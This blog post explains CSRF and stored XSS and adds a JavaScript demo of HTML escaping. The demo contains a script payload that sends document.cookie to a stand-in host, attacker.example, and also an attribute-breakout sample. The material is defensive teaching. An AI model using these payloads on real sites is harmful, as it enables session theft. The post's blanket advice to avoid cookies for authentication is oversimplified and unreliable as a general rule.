Sunday, January 29, 2017

CSRF/XSS summary

CSRF
-----

If you are using cookies for authentication, the browser attaches the cookie to every request to your domain no matter which page started the request. So someone can embed URLs from your domain in a random webpage to trigger side effects with your user's session.
For example, if you log users out with a GET to http://domain.com/logout and someone puts <img src="http://domain.com/logout"/> in his webpage, any of your logged-in users who visit that page are immediately logged out.
Similarly POST URLs can be embedded in auto-submitting <form> elements on the attacker's page.

But if you are not using cookies, for example you might be using JWT and storing the token in localStorage and sending it in a header from your own JavaScript, a third-party page cannot make the browser attach it, so you are safe from CSRF. The trade-off is that anything in localStorage is readable by any script running on your page, so an XSS bug (see below) steals the token instead of the cookie. If you do keep cookies, set SameSite on them and require an anti-CSRF token on every state-changing request.

Best solution: Don't use cookies for authentication

XSS
-----

A bad guy posts a message on a forum. The message contains a <script> tag, and the forum inserts it into the page without escaping it. Whenever anyone visits the forum, that JavaScript runs in the visitor's browser under the forum's origin and sends that person's cookie (document.cookie) to the attacker. This is stored XSS.

Solution: Escape any HTML or user-submitted content you publish on your website, using the encoding for the context you insert it into (HTML text, attribute value, URL). Also mark the session cookie HttpOnly so page scripts cannot read it; a token kept in localStorage has no equivalent protection.
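Added example, not code from the original post: the forum message from the paragraph above rendered once without escaping and once through an HTML encoder, so the difference is visible in the markup. The payload string, the attacker hostname and the function names are constructed for this example.

```javascript
// Added example, not code from the original post. It shows the forum message from
// the paragraph above going through an escaping step before it is put in the page,
// and the same message rendered without it. The payload and attacker host are constructed.
const HTML_ESCAPES = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };

// Encoding for HTML text content and quoted attribute values. It is not enough for other
// contexts (inside <script>, in a URL, in an event-handler attribute); those need their own encoder.
function escapeHtml(s) {
  return String(s).replace(/[&<>"']/g, (c) => HTML_ESCAPES[c]);
}

// Vulnerable rendering: the bug from the paragraph above, user input concatenated as-is.
function renderPostUnsafe(author, message) {
  return `<div class="post"><b>${author}</b>: ${message}</div>`;
}

// Fixed rendering: every user-controlled value is escaped for the context it lands in.
function renderPost(author, message) {
  return `<div class="post" data-author="${escapeHtml(author)}">` +
    `<b>${escapeHtml(author)}</b>: ${escapeHtml(message)}</div>`;
}

// Rough detector, only to make the difference visible in the demo below:
// does the markup contain a real <script> start tag?
function hasScriptTag(html) {
  return /<script[\s>]/i.test(html);
}

// The attacker's post. With a cookie session it exfiltrates document.cookie unless the cookie
// is HttpOnly; with a JWT in localStorage it would read localStorage.getItem('jwt') instead.
const payload = '<script>new Image().src="https://attacker.example/?c="+document.cookie</script>';

function demo() {
  const unsafe = renderPostUnsafe('mallory', payload);
  const safe = renderPost('mallory', payload);
  return { unsafe, safe, unsafeExecutes: hasScriptTag(unsafe), safeExecutes: hasScriptTag(safe) };
}

console.log(demo());
```

Note that escapeHtml also encodes quotes, which is what keeps an author name like `x" onmouseover="alert(1)` from breaking out of the data-author attribute; an encoder that only handles < and > would leave that hole open.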
